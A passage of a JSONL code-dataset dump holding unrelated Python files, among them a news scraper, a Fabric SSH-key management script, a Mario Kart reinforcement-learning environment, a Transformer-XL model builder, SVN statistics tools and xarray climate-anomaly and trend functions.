user_id=user_id,\n field_id=field_id\n ).first()\n return shared_field_instance\n\n @staticmethod\n def validate_post_data(data):\n \"\"\"\n Validate data by SharedFieldPostSchema\n \"\"\"\n schema = SharedFieldPostSchema()\n errors = schema.validate(data)\n return (not bool(errors), errors)\n","sub_path":"src/app/services/shared_field.py","file_name":"shared_field.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"58777116","text":"# coding=utf-8\nimport requests\nimport re\nimport json\nfrom lxml import etree\nfrom pymysql import *\nimport datetime\nimport time\nclass NewsSpider:\n def __init__(self):\n self.start_url = \"https://api.jinse.com/v4/information/list/?catelogue_key=tech&information_id=0&limit=20&flag=down&version=9.9.9\"\n self.next_url_temp = \"https://api.jinse.com/v4/information/list/?catelogue_key=tech&information_id={}&limit=20&flag=down&version=9.9.9\"\n self.headers= {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\"}\n self.session = requests.session()\n self.proxies = proxies = {\"http\":\"http://39.137.46.70:8080\"}\n def parse_url(self,url):\n response = self.session.get(url,headers=self.headers,proxies = self.proxies)\n return response.content.decode()\n\n def get_first_page_content_list(self,html_str): #提取第一页的url和最后一个信息的id\n html = etree.HTML(html_str)\n div_list = html.xpath(\"//div[@class='article-main']/div[1]\")\n content_list = []\n for div in div_list:\n item = {}\n item['data_url'] = div.xpath('./ol/a/@href')\n # print(item['data_url'])\n item['data-information-id'] = div.xpath('//ol/@data-information-id')[-1]\n # print( item['data-information-id'])\n content_list.append(item)\n url_list = content_list[0]['data_url']\n\n # print(url_list)\n return content_list,url_list\n # return item['data-information-id'],item['data_url']\n\n\n\n def get_detail_page(self,html_list):\n # print(html_list)\n item = {}\n content1 = re.sub(r\"\\\\n
    \\\\n\\\\n|width=\\\"\\d+\\\" height=\\\"\\d+\\\"\", \"\",str(re.findall(r'.*?(.*?)', html_list, re.DOTALL)))\n content3 = re.sub(r\"

    \", \"

    \", content1)\n # print(type(content1))\n content2 = re.sub(r\"< img src=\",\" : }\n \"\"\"\n\n #combine packages from official status, unofficial, and ignored\n packages = get_unofficial_status()\n packages.update(get_ros2_release())\n packages.update(get_ignore_packages())\n\n statuses = {}\n for pkg in pkgs:\n statuses[pkg] = packages.get(pkg, MigrationStatus.not_migrated)\n\n return statuses\n","sub_path":"ros2_migration/effort_estimation/ros2_release_checker.py","file_name":"ros2_release_checker.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123675461","text":"import random\nimport numpy as np\nimport screengrab as sg\nimport readmem as rm\nimport inputs as input_wrapper\nimport utils as utils\nimport time\n\nclass ActionSpace():\n def __init__(self):\n self.size = input_wrapper.get_input_count()\n\n def get_size(self):\n return self.size\n\n def sample(self):\n return np.random.randint(0, self.size)\n\nclass Env():\n def __init__(self, done_steps = 100, pid = None):\n self.pid = int(pid)\n self.done_counter = 0\n self.max_steps = done_steps\n self.done = False\n self.rank = 5\n self.action_space = ActionSpace()\n\n # start the stuff\n self._start_kart()\n\n self.set_rank()\n self.rank = None\n self.previous_rank = self.rank\n\n def _start_kart(self):\n input_wrapper.reset()\n\n sg.init()\n window = utils.find_window('.*Mkart.*')\n hier = utils.get_hier(window)\n geometry = utils.get_geometry(hier[1])\n\n # tweak for half screen view and kill menubar\n geometry['y'] += 30\n geometry['h'] = 105\n geometry['w'] -= 5\n\n self.geometry = geometry\n\n im = sg.grab_screen_grey(geometry['x'], geometry['y'], geometry['w'], geometry['h'])\n im = sg.get_image_grey(geometry['w'], geometry['h'], im)\n im.save('./output/test.png', 'PNG')\n\n with open('/proc/{}/maps'.format(self.pid)) as f:\n for line in f.readlines():\n if '[heap]' in line:\n heap_start = line.split('-')[0]\n heap_start = int(heap_start, 16)\n\n self.heap_start = heap_start\n break\n\n def reset(self):\n self.done = False\n input_wrapper.focus(self.geometry)\n input_wrapper.release()\n input_wrapper.reset()\n time.sleep(0.25)\n self.previous_rank = self.rank = 5 # TODO magic number\n\n def get_done(self):\n return self.get_rank() == 8\n\n def set_rank(self):\n self.previous_rank = self.rank\n rank = rm.get_player_rank(self.pid, self.heap_start)\n rank &= 0xff\n if rank > 0 and rank < 9:\n self.rank = rank\n return\n\n def set_done(self):\n self.done = self.rank == 8\n\n def get_position_reward(self, rank, previous_rank):\n if not rank or not previous_rank: return 0\n\n if rank == previous_rank:\n return 1\n if rank < previous_rank:\n return 10\n if rank > previous_rank:\n return -100\n\n def get_reward(self, rank, previous_rank):\n b_mod = 0\n\n if 'b' in input_wrapper.get_pressed():\n # give extra points for mashing B\n b_mod = 1\n\n return b_mod + self.get_position_reward(rank, previous_rank)\n\n def get_pixel_data(self):\n return sg.grab_screen_grey(\n self.geometry['x'],\n self.geometry['y'],\n self.geometry['w'],\n self.geometry['h'])\n\n def get_action_size(self):\n return self.action_space.get_size()\n\n def get_input_shape(self):\n return self.get_screen().shape\n\n def get_screen(self):\n return np.reshape(self.get_pixel_data(), [self.geometry['w'], self.geometry['h'], 1])\n\n def do_action(self, action):\n input_wrapper.do_input(action)\n\n def step(self, action):\n if action is not None: self.do_action(action)\n self.set_rank()\n self.set_done()\n\n observation = self.get_screen()\n reward = self.get_reward(self.rank, self.previous_rank)\n done = self.done\n info = None\n\n return (observation, reward, done, info)\n","sub_path":"src/environments/kart.py","file_name":"kart.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"338884489","text":"def word_2_list(word):\n list = []\n for letter in word:\n list.append(letter)\n list.sort()\n return(list)\n\nfilename = './com_test.txt'\ncombinations = []\nf = open(filename, 'r')\nlines = f.readlines()\nfor line in lines:\n combinations.append(line[:-1]) #[:-1]で改行\"\"\\n\"を取り除く\nf.close()\n\nletters = input(\"何か5文字 >\")\nl_original = word_2_list(letters)\n\nl = []\nfor com in combinations:\n #print(com)\n l_in = l_original\n #print(\"まずはそのまま l_in:\", l_in)\n for i in range(len(com)):\n if com[i] == \"1\":\n #print(i,\"に1\")\n l_in_left = l_in[:i]\n l_in_right = l_in[i+1:]\n l_in = l_in_left\n l_in.append(\"\")\n l_in.extend(l_in_right)\n #print(l_in, \"に l_in を変更\")\n #print(\"空白除去前のl_in:\", l_in)\n while True:\n try:\n l_in.remove(\"\")\n except ValueError:\n break\n #print(\"空白除去後のl_in:\", l_in, \"\\n\")\n if l_in != []:\n l.append(l_in)\n\nfor item in l:\n print(item)\n\n#l_in_each\n","sub_path":"select_letter.py","file_name":"select_letter.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"612760492","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict, Counter\nimport argparse\nimport hashlib\nimport itertools\nimport json\nimport random\nimport string\nimport sys\nimport pprint\nimport operator\n\n\nREDUNDANCY = 8\nTERMINATOR = '_'\nCOLORS = ['maroon', 'purple', 'blue', 'pink', 'green']\nSHAPES = ['circle', 'rectangle', 'triangle', 'pentagon', 'star']\n\npatterns = list(itertools.product(itertools.product(SHAPES, COLORS), repeat=3))\n\ndef gen_character_mapping(key):\n random.seed(str(key))\n characters = string.ascii_lowercase + ' .?!' + TERMINATOR\n character_patterns = random.sample(patterns, len(characters))\n return dict(zip(characters, character_patterns))\n\ndef encode(user_input):\n key = random.choice(patterns)\n mapping = gen_character_mapping(key)\n\n key_list = [[' '.join(x) for x in key]]\n terminator_list = [[' '.join(x) for x in mapping[TERMINATOR]]]\n mapping_list = [[' '.join(x) for x in mapping[char]] for char in user_input]\n input_to_patterns = key_list + mapping_list + terminator_list\n\n print(json.dumps(input_to_patterns))\n \ndef column(matrix, i):\n return [row[i] for row in matrix]\n\ndef decode(input_message):\n message_concat = [] \n for i in range(len(input_message)):\n message_concat.append([])\n for j in range(len(input_message[i])):\n msg = input_message[i][j][2].lower()\n if (msg.split(' ')[0] != ''):\n message_concat[i].append(input_message[i][j][2].lower())\n formatted_message = list(filter(lambda x: len(x) == 24, message_concat))\n encodedMessage = []\n # decodedMessage = defaultdict(int)\n for msg in formatted_message:\n new_message = []\n for i in range(8):\n new_message.append(tuple(map(lambda x: tuple(x.split(\" \")), msg[i * 3 : i * 3 + 3])))\n encodedMessage.append(tuple(new_message))\n decodedMainArray = [[] for i in range(len(encodedMessage) - 2)]\n for i in range(8):\n msg = decode_message(column(encodedMessage, i))\n for i in range(len(msg)):\n decodedMainArray[i].append(msg[i])\n # pprint.pprint(decodedMainArray)\n \n decodedMessage = \"\"\n for i in range(len(decodedMainArray)):\n a = filter(lambda x: x != '_', decodedMainArray[i])\n # most_common, num_most_common = Counter(a).most_common(1)[0]\n # print(most_common, num_most_common)\n decodedMessage += Counter(a).most_common(1)[0][0]\n return decodedMessage\n \ndef decode_message(encoded_characters):\n key = encoded_characters[0]\n mapping = gen_character_mapping(key) \n # if mapping[TERMINATOR] != encoded_characters[-1]:\n # print(encoded_characters[-1], '\\n', mapping[TERMINATOR])\n # key = encoded_characters[-1]\n # mapping = gen_character_mapping(key)\n # if mapping[TERMINATOR] != encoded_characters[0]:\n # return 'Could not decode message' \n # encoded_characters = encoded_characters[::-1]\n mapping = dict(map(reversed, mapping.items()))\n decodedArray = []\n for char in encoded_characters[1:-1]:\n if char not in mapping:\n decodedArray += \"_\"\n else: \n decodedArray += mapping[char]\n return decodedArray\n\n\ndef main():\n parser = argparse.ArgumentParser()\n action_group = parser.add_mutually_exclusive_group(required=True)\n action_group.add_argument('-d', '--decode')\n args = parser.parse_args()\n \n if args.decode:\n decode(args.decode)\n else:\n raise ValueError\n\nif __name__ == '__main__':\n main()\n","sub_path":"decoderFiles/randomizedDecoder.py","file_name":"randomizedDecoder.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"611697594","text":"from fabric.api import env\nfrom fabric.colors import green, blue, yellow\nfrom fabric.context_managers import quiet\nfrom fabric.decorators import task\nfrom fabric.operations import prompt\n\nfrom keymanager import KeysFile\n\n\n@task\ndef list_users():\n \"\"\"\n Read the contents of a servers authorized_keys file\n\n e.g: fab list_users --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n\n print(green('\\n================== {}:'.format(env.host_string)))\n for user in keyfile.users:\n print(blue('\\t ' + user.name))\n\n\n@task\ndef add_user():\n \"\"\"\n Add a user to a server using the given identity file\n\n e.g fab add_user --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n user = prompt(green(\"Paste key or file path:\") + \"\\n\\n\",\n validate=keyfile.validate_user)\n\n if keyfile.add_user(user):\n print(green('{} authorized'.format(user.name, env.host_string)))\n else:\n print(yellow('{} already authorized, skipping'.format(user.name)))\n\n\n@task\ndef delete_user(username=None):\n \"\"\"\n Remove a user from a server\n\n e.g fab delete_user --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n\n if not username:\n username = prompt(green(\"Username: \"))\n\n removed = keyfile.delete_user(username)\n\n if removed:\n print(green('{} removed'.format(username, env.host_string)))\n else:\n print(yellow('{} not in keys, skipping'.format(username)))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411234857","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom tensorflow.python import keras\nfrom keras_adaptive_softmax import AdaptiveEmbedding, AdaptiveSoftmax\nfrom keras_layer_normalization import LayerNormalization\nfrom keras_position_wise_feed_forward import FeedForward\n# from tensorflow.python.keras.layers import Embedding\nfrom .contrib import Scale, Memory, PositionalEmbedding, RelativeBias, RelativePartialMultiHeadSelfAttention\n\n\ndef get_custom_objects():\n return {\n 'AdaptiveEmbedding': AdaptiveEmbedding,\n 'AdaptiveSoftmax': AdaptiveSoftmax,\n 'Scale': Scale,\n 'Memory': Memory,\n 'LayerNormalization': LayerNormalization,\n 'FeedForward': FeedForward,\n 'PositionalEmbedding': PositionalEmbedding,\n 'RelativeBias': RelativeBias,\n 'RelativePartialMultiHeadSelfAttention': RelativePartialMultiHeadSelfAttention,\n }\n\n\ndef set_custom_objects():\n for name, layer in get_custom_objects().items():\n keras.utils.get_custom_objects()[name] = layer\n\nclass MemorySequence(keras.utils.Sequence):\n\n def __init__(self,\n model: keras.models.Model,\n sequence: keras.utils.Sequence,\n target_len: int):\n \"\"\"Initialize the sequence.\n\n :param model: The built model.\n :param sequence: The original sequence.\n :param target_len: The length of prediction.\n \"\"\"\n self.model = model\n self.sequence = sequence\n self.target_len = target_len\n\n self.indice = []\n for i in range(len(sequence)):\n item = sequence[i]\n length = self._get_first_shape(item)[1]\n number = (length + target_len - 1) // target_len\n for j in range(number):\n self.indice.append((i, j))\n\n self.last_index, self.last_item = -1, None\n\n self.memory_length_index = None\n for i, input_layer in enumerate(model.inputs):\n name = input_layer.name.split(':')[0].split('/')[0]\n if name.startswith('Input-Memory-Length'):\n self.memory_length_index = i\n break\n\n def __len__(self):\n return len(self.indice)\n\n def __getitem__(self, index):\n sub_index, sub_num = self.indice[index]\n if sub_index == self.last_index:\n item = self.last_item\n else:\n item = self.sequence[sub_index]\n self.last_index = sub_index\n self.last_item = item\n start = sub_num * self.target_len\n stop = start + self.target_len\n s = slice(start, stop)\n batch_size = self._get_first_shape(item)[0]\n\n if isinstance(item[0], (list, tuple)):\n inputs = [self._pad_target(sub_item[:, s, ...]) for sub_item in item[0]]\n else:\n inputs = [self._pad_target(item[0][:, s, ...])]\n memory_length_input = np.ones(batch_size) * sub_num * self.target_len\n inputs = inputs[:self.memory_length_index] + [memory_length_input] + inputs[self.memory_length_index:]\n\n if isinstance(item[1], (list, tuple)):\n outputs = [self._pad_target(sub_item[:, s, ...]) for sub_item in item[1]]\n else:\n outputs = self._pad_target(item[1][:, s, ...])\n return inputs, outputs\n\n @staticmethod\n def _get_first_shape(item):\n if isinstance(item[0], (list, tuple)):\n return item[0][0].shape\n return item[0].shape\n\n def _pad_target(self, item: np.ndarray):\n length = item.shape[1]\n if length != self.target_len:\n if item.ndim == 2:\n return np.pad(item, ((0, 0), (0, self.target_len - length)), 'constant', constant_values=0)\n return np.pad(item, ((0, 0), (0, self.target_len - length), (0, 0)), 'constant', constant_values=0)\n return item\n\ndef build_transformer_xl(units,\n embed_dim,\n hidden_dim,\n num_token,\n num_block,\n num_head,\n batch_size,\n memory_len,\n target_len,\n dropout=0.0,\n attention_dropout=0.0,\n cutoffs=None,\n div_val=1,\n force_projection=None,\n bind_embeddings=True,\n bind_projections=True,\n clamp_len=None,\n share_biases=True):\n \"\"\"Build transformer-XL model.\n\n :param units: Units inside the transformer.\n :param embed_dim: Dimension of embeddings.\n :param hidden_dim: Dimension inside position-wise feed-forward layer.\n :param num_token: Number of distinct input tokens.\n :param num_block: Number of basic encoder blocks.\n :param num_head: Number of heads for attention.\n :param batch_size: Maximum batch size.\n :param memory_len: The maximum length of memories.\n :param target_len: The length of prediction block.\n :param dropout: General dropout rate.\n :param attention_dropout: Dropout rate inside attention layer.\n :param cutoffs: Cutoffs of adaptive embedding.\n :param div_val: Scale factor of adaptive embedding.\n :param force_projection: Add projection when the dimensions are equal.\n :param bind_embeddings: Whether to bind embeddings to adaptive softmax.\n :param bind_projections: Whether to bind projections to adaptive softmax.\n :param clamp_len: The maximum value of relative position.\n :param share_biases: Whether to use the same biases for all layers.\n :return: The built model.\n \"\"\"\n token_input = keras.layers.Input(shape=(target_len,), name='Input-Token')\n memory_length_input = keras.layers.Input(shape=(1,), name='Input-Memory-Length')\n inputs = [token_input, memory_length_input]\n\n results = AdaptiveEmbedding(\n input_dim=num_token,\n output_dim=units,\n embed_dim=embed_dim,\n cutoffs=cutoffs,\n div_val=div_val,\n mask_zero=True,\n force_projection=force_projection,\n return_embeddings=True,\n return_projections=True,\n name='Embed-Token',\n )(token_input)\n token_embed, embedding_weights = results[0], results[1:]\n token_embed = Scale(scale=np.sqrt(units), name='Embed-Token-Scaled')(token_embed)\n last_memory = Memory(\n batch_size=batch_size,\n memory_len=memory_len,\n target_len=target_len,\n output_dim=units,\n name='Memory-0',\n )([token_embed, memory_length_input])\n\n position_embed = PositionalEmbedding(\n output_dim=units,\n clamp_len=clamp_len,\n name='Embed-Position',\n )([token_input, last_memory])\n\n if 0.0 < dropout < 1.0:\n token_embed = keras.layers.Dropout(rate=dropout, name='Embed-Token-Dropped')(token_embed)\n position_embed = keras.layers.Dropout(rate=dropout, name='Embed-Position-Dropped')(position_embed)\n\n context_bias, relative_bias = None, None\n if share_biases:\n context_bias, relative_bias = RelativeBias(units=units, name='Biases')(last_memory)\n\n outputs = [token_embed]\n for i in range(num_block):\n block_input, block_output = outputs[-1], outputs[-1]\n if not share_biases:\n context_bias, relative_bias = RelativeBias(units=units, name='Biases-{}'.format(i + 1))(last_memory)\n block_output = RelativePartialMultiHeadSelfAttention(\n units=units,\n num_head=num_head,\n use_bias=False,\n attention_dropout=attention_dropout,\n name='Attention-{}'.format(i + 1),\n )([block_output, position_embed, last_memory, context_bias, relative_bias])\n block_output = keras.layers.Add(name='Attention-Res-{}'.format(i + 1))([block_input, block_output])\n if 0.0 < dropout < 1.0:\n block_output = keras.layers.Dropout(rate=dropout, name='Attention-Dropped-{}'.format(i + 1))(block_output)\n block_output = LayerNormalization(name='Attention-Norm-{}'.format(i + 1))(block_output)\n\n block_input = block_output\n block_output = FeedForward(\n units=hidden_dim,\n dropout_rate=dropout,\n name='FeedForward-{}'.format(i + 1),\n )(block_output)\n block_output = keras.layers.Add(name='FeedForward-Res-{}'.format(i + 1))([block_input, block_output])\n if 0.0 < dropout < 1.0:\n block_output = keras.layers.Dropout(rate=dropout, name='FeedForward-Dropped-{}'.format(i + 1))(block_output)\n block_output = LayerNormalization(name='FeedForward-Norm-{}'.format(i + 1))(block_output)\n\n if i < num_block - 1:\n last_memory = Memory(\n batch_size=batch_size,\n memory_len=memory_len,\n target_len=target_len,\n output_dim=units,\n name='Memory-{}'.format(i + 1),\n )([block_output, memory_length_input])\n\n outputs.append(block_output)\n\n softmax = AdaptiveSoftmax(\n input_dim=units,\n output_dim=num_token,\n embed_dim=embed_dim,\n cutoffs=cutoffs,\n div_val=div_val,\n force_projection=force_projection,\n bind_embeddings=bind_embeddings,\n bind_projections=bind_projections,\n name='Softmax',\n )(outputs[-1:] + embedding_weights)\n\n model = keras.models.Model(inputs=inputs, outputs=softmax)\n return model\n","sub_path":"src/transformer_xl.py","file_name":"transformer_xl.py","file_ext":"py","file_size_in_byte":9465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209523018","text":"#Create a Python dictionary that contains a bunch of fruits and their prices.\r\n#Write a program that checks if a certain fruit is available or not.\r\nfruit_dictionary =\t{\r\n \"Apple\": 120,\r\n \"Mango\": 200,\r\n \"Orange\": 50,\r\n \"Guava\": 50,\r\n \"Kiwi\": 200,\r\n \"Malta\": 500,\r\n \"Dragonfruit\": 300,\r\n \"Lichi\": 100\r\n}\r\nfruit = input(\"Enter a fruit name \")\r\nif (fruit in fruit_dictionary): #Checking fruit is available or not\r\n print(fruit +\" exists in the dictionary\")\r\nelse:\r\n print(fruit +\" doesn't exist in the dictionary\")","sub_path":"Python/Activities/Activity11.py","file_name":"Activity11.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"160492766","text":"import SVNDStatusUtil.SVNMonth\r\nimport Common.DateUtil\r\nimport Common.PropertiesUtil\r\nimport os\r\nimport Common.FTPUtil\r\nimport SVNDStatusUtil.SVN\r\nfrom Common import yaml_utill\r\nfrom Common.ReadFile import readFileReturnList\r\n\r\n\r\ndef clearNotNeeDictReplist(dictReplist):\r\n needNameList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n # print(\"needNameList=\",needNameList)\r\n for ele in dictReplist:\r\n for eleEle in list(ele.keys()):\r\n for eleEleEle in list(ele.get(eleEle).keys()):\r\n # print(\"eleEleEle=\",eleEleEle)\r\n # print(eleEleEle not in needNameList)\r\n if (eleEleEle not in needNameList) and (eleEleEle!=\"all\"):\r\n del ele.get(eleEle)[eleEleEle]\r\n return dictReplist\r\n\r\n\r\ndef clearNotNeedDictDevlist(dictDevlist):\r\n needNameList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n for ele in dictDevlist:\r\n for keys in list(ele.keys()):\r\n if (keys not in needNameList) and (keys !=\"all\"):\r\n del ele[keys]\r\n return dictDevlist\r\n\r\ndef getDevSum(dictDevlist):\r\n needNameList = Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n devSum={}\r\n for name in needNameList:\r\n globals()[\"%sAllModifiedLines\"%name]=0\r\n for dict2 in dictDevlist:\r\n # print(\"dict2=\",dict2)\r\n for name in needNameList:\r\n try:\r\n globals()[\"%sAllModifiedLines\" % name]+=dict2.get(name)[0]\r\n except:\r\n globals()[\"%sAllModifiedLines\" % name] += 0\r\n for name in needNameList:\r\n devSum[name]= globals()[\"%sAllModifiedLines\" % name]\r\n return devSum\r\n\r\ndef get_yaml_name():\r\n person_list=[]\r\n teamdata=yaml_utill.get_yaml_data(\"../configs/teamconfig.yaml\")\r\n for team in teamdata:\r\n for person in team.get(\"person\"):\r\n person_list.append(person)\r\n teamdata=yaml_utill.get_yaml_data(\"../configs/departmentconfig.yaml\")\r\n for team in teamdata:\r\n for person in team.get(\"person\"):\r\n person_list.append(person)\r\n return set(person_list)\r\n\r\n\r\n\r\n\r\ndef getNeedAccount():\r\n SVNAccountList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\SVNAccount.txt\")\r\n excludeAccountList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\excludeAccount.txt\")\r\n # print(\"excludeAccountList=\",excludeAccountList)\r\n needAccountList=[]\r\n for name1 in SVNAccountList:\r\n # print(\"name1=\",name1)\r\n if name1 not in excludeAccountList:\r\n needAccountList.append(name1)\r\n # print(\"needAccountList=\",needAccountList)\r\n with open(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\",\"w\") as f:\r\n i=0\r\n while i latest_year:\n latest_year = year\n if rows is not None:\n rows.append(row)\n output_csv()\n return datasets, showcases\n","sub_path":"faostat.py","file_name":"faostat.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"540960169","text":"from flask import make_response\nfrom flask import session as login_session \nfrom ... import clearLoginSession \nimport httplib2\nimport json\n\nfrom . import mod_oauth2\n\n@mod_oauth2.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n if access_token is None:\n response = make_response(json.dumps(\n 'Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n url = ('https://accounts.google.com/o/oauth2/revoke?token=%s'\n % login_session['access_token'])\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n if result['status'] == '200':\n del login_session['gplus_id']\n del login_session['access_token']\n clearLoginSession()\n response = make_response(json.dumps(\n 'Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n","sub_path":"app/views/mod_oauth2/gdisconnect.py","file_name":"gdisconnect.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"325970419","text":"# -*- coding: utf-8 -*-\n\n\n__all__ = ['anomaly', 'trend', 'trend_per_month', 'trend_mon_percentile',\n 'day_night_departures', 'correlate', 'covariance', 'resample_nanmean']\n#\n# global Variables\n#\nmonth_to_season = {1: 'DJF', 2: 'DJF', 3: 'MAM', 4: 'MAM', 5: 'MAM', 6: 'JJA', 7: 'JJA', 8: 'JJA', 9: 'SON',\n 10: 'SON', 11: 'SON', 12: 'DJF'}\n\n\n#\n# # Counting and Selecting\n#\n\n\ndef select_period(data, dim='time', period=None):\n from ..fun.cal import nanrange\n from xarray import DataArray, Dataset\n\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError('requires an xarray DataArray, Dataset', type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n if period is None:\n data.attrs['period'] = '%d-%d' % nanrange(data[dim].dt.year.values)\n return data\n else:\n iperiod = '%d-%d' % nanrange(data[dim].to_series()[period].index.year.values)\n data = data.sel(**{dim: period})\n data.attrs['period'] = iperiod\n return data\n\n\ndef estimate_sample_size(data, ratio=0.6, freq='12h'):\n \"\"\" Estimate the sample size from a timeseries, given freq and ratio\n\n Args:\n data (DataArray): Inputdata\n ratio (float): percentage of dataset as ratio\n freq (str): Pandas freq str\n\n Returns:\n int : Sample size according to freq and ratio\n \"\"\"\n import numpy as np\n import pandas as pd\n from xarray import DataArray\n from ..fun import cal as fc\n\n if not isinstance(data, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n date_dim = data.get_date_dimension()\n dates = pd.DatetimeIndex(data.dims[date_dim])\n axis = data.order.index(date_dim)\n dates = pd.date_range(dates.min().replace(hour=np.min(dates.hour.values)),\n dates.max().replace(hour=np.max(dates.hour.values)), freq=freq)\n years = fc.nanrange(dates.year)\n print(\"Estimate Sample size (%d%%, F:%s): %d [%d : %d] %d %d\" % (\n int(ratio * 100), freq, int(dates.size * ratio), years[0], years[1], np.diff(years) + 1, dates.size))\n print(100 * data.apply(fc.nancount, axis=axis).to_pandas() / float(dates.size))\n return int(dates.size * ratio)\n\n\n#\n# Climatology and Anomalies\n#\n\n\ndef climatology(data, dim='time', period=None, keep_attrs=True):\n \"\"\"\n\n Args:\n data (DataArray): Input Data\n dim (str): datetime dimension\n period (slice): datetime selection\n keep_attrs (bool) : xarray keep attributes\n Returns:\n DataArray : Climate Monthly Means\n \"\"\"\n from xarray import DataArray, Dataset\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n data = select_period(data, dim=dim, period=period) # adds metadata and selects if not None\n return data.groupby(dim + '.month').mean(dim, keep_attrs=keep_attrs)\n\n\ndef anomaly(data, dim='time', period=None, keep_attrs=True):\n \"\"\" Calculates the anomaly from the climatology per month of a time series\n\n Args:\n data (DataArray) : Inputdata\n dim (str) : datetime dimension\n period (slice, str) : Indices of Dates for calculation\n keep_attrs (bool) : xarray keep attributes\n Returns:\n DataArray : Anomalies\n \"\"\"\n from xarray import DataArray, Dataset, set_options\n from ..fun.xarray import set_attrs\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n data = data.copy()\n # Calculate Climatology\n clim = climatology(data, dim=dim, period=period, keep_attrs=keep_attrs)\n # Calculate Anomaly\n with set_options(keep_attrs=keep_attrs):\n data = data.groupby(dim + '.month') - clim\n\n data = data.drop('month')\n if isinstance(data, Dataset):\n for ivar in data.data_vars:\n set_attrs(data[ivar], 'standard_name', add='_ano', default='anomaly')\n data[ivar].attrs['period'] = clim.attrs['period']\n else:\n set_attrs(data, 'standard_name', add='_ano', default='anomaly')\n data.attrs['period'] = clim.attrs['period']\n return data\n\n\n#\n# Trend Estimation\n#\n\n\ndef trend(data, dim='time', use_anomalies=True, period=None, min_periods=3, method='theil_sen',\n alpha=0.95, keep_attrs=True, only_slopes=False, **kwargs):\n \"\"\" Calculate Trend estimates\n\n Args:\n data (DataArray): input dataset array\n dim (str): datetime dimension\n use_anomalies (bool): calc. trends from anomalies (climatology removed)\n period (slice): time period for climatology\n min_periods (int): minimum number of values for trend estimate\n method (str): polyfit, theil_sen, linregress, lsq\n alpha (float): get confidence levels for that p value\n keep_attrs (bool): keep DataArray Attributes?\n only_slopes (bool): return only slopes (e.g. for Datasets)\n\n Returns:\n DataArray : trends\n \"\"\"\n import numpy as np\n from xarray import DataArray, Dataset\n from .. import fun as ff\n\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a DataArray class object\")\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n if method not in ['polyfit', 'theil_sen', 'linregress', 'lsq']:\n raise ValueError(\"Requires either polyfit, theil_sen, linregress or lsq\")\n\n if isinstance(data, Dataset):\n if use_anomalies:\n data = anomaly(data, dim=dim, period=period, keep_attrs=keep_attrs)\n\n out = {}\n for ivar in data.data_vars:\n out[ivar] = trend(data[ivar], dim=dim, use_anomalies=False, method=method, keep_attrs=keep_attrs,\n only_slopes=True)\n\n out = Dataset(out)\n out.attrs.update(data.attrs.copy())\n return out\n\n data = data.copy()\n per = np.timedelta64(1, 'D') / np.timedelta64(1, 'ns') # factor for trends\n axis = data.dims.index(dim)\n coords = {idim: data[idim].copy() for idim in data.dims if idim != dim}\n dimens = list(data.dims[:])\n dimens.remove(dim)\n attrs = data.attrs.copy()\n\n if use_anomalies:\n data = anomaly(data, dim=dim, period=period, 